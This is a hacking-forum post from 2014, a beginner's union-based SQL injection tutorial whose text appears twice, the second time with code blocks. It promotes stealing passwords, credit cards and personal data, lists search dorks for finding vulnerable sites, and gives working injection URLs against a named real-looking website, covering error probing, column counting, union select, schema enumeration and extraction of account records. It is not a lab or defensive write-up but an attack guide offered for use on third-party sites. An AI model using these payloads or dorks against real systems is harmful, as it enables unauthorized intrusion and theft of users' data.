Powerful Union SQLi Tutorial 09-18-2014, 03:33 AM
#1
SQLI (In General)
Basically, SQLi is the abuse and exploitation of a MySQL Database that most websites (and even some professional websites) run on/with. With a series of tags/statements in a URL bar you are able to gain access fairly easily to most common websites. Most of which contain important information, user account logins, and personal details that you can use for your own gain. One example would be shelling the website. (Will not cover what a shell is in this website, feel free to browse the other sections of the forum)
What can I do with Union SQLi?
- Shell Websites
- Deface Websites
- Steal Personal Information
- Steal Credit Card Information
- Steal Passwords
- Simply for a learning experience.
(And so much more)
Do I have to be a master to do these things?
Hell no! Union SQLi is incredibly easy, and once you practice you'll be able to recognize the most vulnerable websites and take advantage of them. Especially poorly coded or older versions of MySQL (Version 4, but most nowadays run on Version 5).
Dorks
No, not you guys
Dorks are common phrases in URL websites and putting them in search engines like Google will help you find websites that you can attempt to SQL Inject. Here are some ones that you can use, but more can be found on Pastebin. I'll provide a link below.
- payment.php?CartID=
- resellers.php?idCategory=
- members.php?id=
- pdetail.php?item_id=
- info.php?ID=
Dork List
Testing whether or not a website is vulnerable
If you want to SQLi a website you need to find out if it is vulnerable or not first, if it is, you'll be able to proceed with the tutorial and attempt to abuse and exploit the vulnerability. I'll be using the website below to demonstrate in this tutorial. Feel free to go back and forth between parts of the tutorial if you have trouble. If you PM me and I have time, I'll respond and attempt to help you.
Put ' at the end of the URL and see what happens when you reload the page.
In my case, I've recieved the error "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1" which shows me that the website is vulnerable. You may receive a different error, but as long as it is similar it'll mean that the website is vulnerable.
Checking vulnerable columns
Now things may get a bit confusing, but believe me when I say it is INCREDIBLY easy. We need to perform the "order+by" tag/statement to continue and display the columns in the MySQL Database.
Start from 1 and increase it slowly until you get an error, in my case, it was #11. Then go down 1 number until you can reload the page with no errors. Once you do that then you can tell how many columns the MySQL Database has and we can proceed.
Wrong:
Correct:
Now we know that the website has 10 columns, and it is time to find out which of them are vulnerable. So now we have to use the tag/statement "null+union+all+select+" and then the vulnerable statements will be very noticeable when we reload the page with the new URL.
Basically just use the the tag/statement and fill it out like I have done until you have the numbers of columns from your website added in properly. If you refresh it you should see random numbers across the page, these are the vulnerable columns.
![[Image: udvTDLB.jpg]](http://i.imgur.com/udvTDLB.jpg)
Finding database name & MySQL version
Once you get up to this stage, it's time for the fun part. If you have followed along successfully, great job!
Alright. It's time to find out what version of MySQL the website with the vulnerability is running. We can do this by using the "@@version" tag/statement.
In my case, it spat out something like "5.1.56-Community" which isn't the most up to date version of MySQL out and that makes things a lot easier. However it is more difficult than version 4 in my own personal opinion. It could differ depending on how good you become.
Alright now it's time for you to see results. This is the moment you've been waiting for, because now, you are nearly done. We'll be using the tag/statement "concat(database())", simply replace your previous @@version tag with this new one and reload the page.
You'll most likely see one or two names, these are the names of the databases that contain all the tables/columns etc with information. These are what we are aiming to get because we either want the admin login or password, or a way to access the actual files the website is using.
Retrieving table names
Now we are going to be using two or more tags in our URL, so feel free to read back or review things to make sure you're doing it right. This tutorial won't be getting outdated or trashed, I'm going to keep it updated for you guys.
We are going to use the tags "group_concat(table_name)" and "from information_schema.tables where table_schema=database()"
After reloading the page with a URL similar to my one like above, it SHOULD spit something out like the following:
![[Image: p3MZs85.jpg]](http://i.imgur.com/p3MZs85.jpg)
Finishing off and claiming your prize
In my case I see "Access" and "Config" but for the sake of making this tutorial shorter/faster to understand, I'll only be abusing/exploiting Access. Now we are going to introduce ASCII, which is a MUST if you are doing this. You HAVE TO use ASCII. I suggest using THIS website if you don't know much about ASCII already.
So we are forced to introduce "group_concat(column_name)" and then you must take your information from the previous URL (Access) and convert it to ASCII. In my case I changed Access to "065 099 099 101 115 115"
It will then give you all the columns in that table, and then there is only one more step to retrieve the information from the columns. We have to introduce the tag/statement "concat(REPLACE THIS WITH COLUMN NAME,0x3a,REPLACE THIS WITH COLUMN NAME)" and +from+REPLACE WITH TABLE NAME--
![[Image: vUOwjBu.jpg]](http://i.imgur.com/vUOwjBu.jpg)
It will give me the ID of an account, and the title (usergroup, rank, etc) of the account. I wont show you guys the password yet, but if you can understand most of the tutorial, it will be extremely easy for you to get it.
If you have any questions or comments, please reply and leave a comment below. It's my first tutorial on this website so go easy please.
Basically, SQLi is the abuse and exploitation of a MySQL Database that most websites (and even some professional websites) run on/with. With a series of tags/statements in a URL bar you are able to gain access fairly easily to most common websites. Most of which contain important information, user account logins, and personal details that you can use for your own gain. One example would be shelling the website. (Will not cover what a shell is in this website, feel free to browse the other sections of the forum)
What can I do with Union SQLi?
- Shell Websites
- Deface Websites
- Steal Personal Information
- Steal Credit Card Information
- Steal Passwords
- Simply for a learning experience.
(And so much more)
Do I have to be a master to do these things?
Hell no! Union SQLi is incredibly easy, and once you practice you'll be able to recognize the most vulnerable websites and take advantage of them. Especially poorly coded or older versions of MySQL (Version 4, but most nowadays run on Version 5).
Dorks
No, not you guys
Dorks are common phrases in URL websites and putting them in search engines like Google will help you find websites that you can attempt to SQL Inject. Here are some ones that you can use, but more can be found on Pastebin. I'll provide a link below.- payment.php?CartID=
- resellers.php?idCategory=
- members.php?id=
- pdetail.php?item_id=
- info.php?ID=
Dork List
Testing whether or not a website is vulnerable
If you want to SQLi a website you need to find out if it is vulnerable or not first, if it is, you'll be able to proceed with the tutorial and attempt to abuse and exploit the vulnerability. I'll be using the website below to demonstrate in this tutorial. Feel free to go back and forth between parts of the tutorial if you have trouble. If you PM me and I have time, I'll respond and attempt to help you.
Code:
https://naesai.org/events.php?id=108Put ' at the end of the URL and see what happens when you reload the page.
Code:
https://naesai.org/events.php?id=108'In my case, I've recieved the error "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1" which shows me that the website is vulnerable. You may receive a different error, but as long as it is similar it'll mean that the website is vulnerable.
Checking vulnerable columns
Now things may get a bit confusing, but believe me when I say it is INCREDIBLY easy. We need to perform the "order+by" tag/statement to continue and display the columns in the MySQL Database.
Code:
https://naesai.org/events.php?id=108+order+by+1--Start from 1 and increase it slowly until you get an error, in my case, it was #11. Then go down 1 number until you can reload the page with no errors. Once you do that then you can tell how many columns the MySQL Database has and we can proceed.
Wrong:
Code:
https://naesai.org/events.php?id=108+order+by+11--Correct:
Code:
https://naesai.org/events.php?id=108+order+by+10--Now we know that the website has 10 columns, and it is time to find out which of them are vulnerable. So now we have to use the tag/statement "null+union+all+select+" and then the vulnerable statements will be very noticeable when we reload the page with the new URL.
Code:
https://naesai.org/events.php?id=null+union+all+select+1,2,3,4,5,6,7,8,9,10--Basically just use the the tag/statement and fill it out like I have done until you have the numbers of columns from your website added in properly. If you refresh it you should see random numbers across the page, these are the vulnerable columns.
Spoiler:
![[Image: udvTDLB.jpg]](http://i.imgur.com/udvTDLB.jpg)
Finding database name & MySQL version
Once you get up to this stage, it's time for the fun part. If you have followed along successfully, great job!
Alright. It's time to find out what version of MySQL the website with the vulnerability is running. We can do this by using the "@@version" tag/statement.Code:
https://naesai.org/events.php?id=null+union+all+select+1,@@version,3,4,5,6,7,8,9,10--In my case, it spat out something like "5.1.56-Community" which isn't the most up to date version of MySQL out and that makes things a lot easier. However it is more difficult than version 4 in my own personal opinion. It could differ depending on how good you become.
Alright now it's time for you to see results. This is the moment you've been waiting for, because now, you are nearly done. We'll be using the tag/statement "concat(database())", simply replace your previous @@version tag with this new one and reload the page.
Code:
https://naesai.org/events.php?id=null+union+all+select+1,concat(database()),3,4,5,6,7,8,9,10--You'll most likely see one or two names, these are the names of the databases that contain all the tables/columns etc with information. These are what we are aiming to get because we either want the admin login or password, or a way to access the actual files the website is using.
Retrieving table names
Now we are going to be using two or more tags in our URL, so feel free to read back or review things to make sure you're doing it right. This tutorial won't be getting outdated or trashed, I'm going to keep it updated for you guys.
We are going to use the tags "group_concat(table_name)" and "from information_schema.tables where table_schema=database()"Code:
https://naesai.org/events.php?id=null+union+all+select+1,group_concat(table_name),3,4,5,6,7,8,9,10 from information_schema.tables where table_schema=database()--After reloading the page with a URL similar to my one like above, it SHOULD spit something out like the following:
Spoiler:
![[Image: p3MZs85.jpg]](http://i.imgur.com/p3MZs85.jpg)
Finishing off and claiming your prize
In my case I see "Access" and "Config" but for the sake of making this tutorial shorter/faster to understand, I'll only be abusing/exploiting Access. Now we are going to introduce ASCII, which is a MUST if you are doing this. You HAVE TO use ASCII. I suggest using THIS website if you don't know much about ASCII already.
So we are forced to introduce "group_concat(column_name)" and then you must take your information from the previous URL (Access) and convert it to ASCII. In my case I changed Access to "065 099 099 101 115 115"
Code:
https://naesai.org/events.php?id=null+union+all+select+1,group_concat(column_name),3,4,5,6,7,8,9,10 from information_schema.columns where table_name=char(065, 099, 099, 101, 115, 115)--It will then give you all the columns in that table, and then there is only one more step to retrieve the information from the columns. We have to introduce the tag/statement "concat(REPLACE THIS WITH COLUMN NAME,0x3a,REPLACE THIS WITH COLUMN NAME)" and +from+REPLACE WITH TABLE NAME--
Code:
https://naesai.org/events.php?id=null+union+all+select+1,concat(AccessID,0x3a,AccessTitle),3,4,5,6,7,8,9,10+from+Access--Spoiler:
![[Image: vUOwjBu.jpg]](http://i.imgur.com/vUOwjBu.jpg)
It will give me the ID of an account, and the title (usergroup, rank, etc) of the account. I wont show you guys the password yet, but if you can understand most of the tutorial, it will be extremely easy for you to get it.
If you have any questions or comments, please reply and leave a comment below. It's my first tutorial on this website so go easy please.
I am not in contact, or involved with Crypt. We are completely different people. Please don't get us confused simply because of one letter in our names.

![[+]](https://sinister.li/images/modern/collapse_collapsed.png)































